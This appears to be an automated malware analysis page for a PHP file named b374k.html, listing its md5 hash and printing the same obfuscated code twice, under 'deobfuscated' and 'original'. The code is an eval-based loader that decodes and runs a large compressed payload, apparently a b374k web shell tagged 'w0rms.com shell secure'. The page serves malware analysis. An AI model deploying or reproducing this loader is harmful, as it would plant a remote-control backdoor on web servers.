PHP Malware Analysis

b374k.html

md5: e4ef2b030a6276a4914b4af29dea09ab

Jump to:

Screenshot


Attributes

Encoding

Execution


Deobfuscated PHP code

<?php//w0rms.com shell secure$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";$r57txt = "==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";eval(htmlspecialchars_decode(urldecode(base64_decode($encoder57txt))));$encodephp="";base64_decode($encodephp);exit;?>

Execution traces


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php//w0rms.com shell secure$encoder57txt = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHI1N3R4dCUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";$r57txt = "==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";eval(htmlspecialchars_decode(urldecode(base64_decode($encoder57txt))));$encodephp="";base64_decode($encodephp);exit;?>